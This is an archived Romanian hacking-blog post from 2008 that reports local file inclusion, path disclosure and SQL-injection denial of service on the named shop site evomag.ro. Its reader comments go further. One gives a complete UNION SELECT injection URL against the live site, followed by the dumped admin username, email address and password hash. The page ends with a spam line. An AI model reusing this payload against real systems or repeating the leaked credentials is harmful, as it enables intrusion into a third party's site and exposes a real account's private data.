HackersBlog » Blog Archive » Evomag.ro, SQL Injection, Self DoS, Path Disclosure, Local File Inclusion

Recent Comments

Loading....

Loading....

Yahoo! again - XSS in Uncategorized (357 Visits)
Yahoo! again - bad settings? in Uncategorized (252 Visits)
Fanii nostri in Uncategorized (183 Visits)
Frustrant in Uncategorized (146 Visits)
La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
... in Uncategorized (38 Visits)
XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
Ce servicii de mail folositi? in (121 Visits)
Azi este ziua userilor hackersblog.org in (120 Visits)
De reţinut in (117 Visits)
Inca o pierdere de timp in (107 Visits)
De tinut minte in (106 Visits)
Twitter in (78 Visits)
Un nou membru in (74 Visits)
Interviu la Radio Lynx in (70 Visits)
2009 in (51 Visits)
Editori noi. in (35 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (199 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (139 Visits)
Ce nu se invata la scoala - (D)DOS (5) in (104 Visits)

Loading....

B7ackAnge7z (1)
Nicu Calcea (1)
andrasi zsolt (1)
Ovidiu U (1)
Dumitru (1)
Andrei Rinea (1)

Evomag.ro, SQL Injection, Self DoS, Path Disclosure, Local File Inclusion

Posted by Shocker in English News

Posted on November 26th, 2008

Un LFI-ul evident cu un rezultat amuzant in cazul includerii fisierului care se ocupa de include-uri (loader.php):

(in dreapta path disclosure)

In urma unui SQL Injection, specially crafted, prin produse.php… self denial of service, asistam la moartea serverului SQL:

Related Posts

October 25, 2009 -- Deja vu
October 23, 2009 -- Evomag spart. Oare pentru a cata oara?
December 24, 2009 -- Forumul Andreei Balan spart
December 22, 2009 -- Fun cu NemoExpres.ro
December 11, 2009 -- Kaspersky Thailand hacked by TinKode

3 Responses to “Evomag.ro, SQL Injection, Self DoS, Path Disclosure, Local File Inclusion”

unu Says:
November 26th, 2008 at 9:21 pm
si sintaxa pt parola adminului
http://www.evomag.ro/produs.php?produs_id=12349999%20uNion%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(username,0×3a,email,0×3a,password),30,31,32%20from%20users limit 0,1–
admin:office@evomag.ro:6a7c88a8ca307cb48e06953690e1463e
crs12decoder Says:
January 5th, 2009 at 12:13 am
Q: de ce nu ai lasat adresa si la 3rd picture?
HackersBlog » Blog Archive » Evomag spart. Oare pentru a cata oara? Says:
October 23rd, 2009 at 4:34 pm
[...] Un alt articol despre evomag: http://www.hackersblog.org/2008/11/26/evomagro-sql-injection-self-dos-path-disclosure-local-file-inc… [...]

Leave a Reply

Download Muzica Filme Porno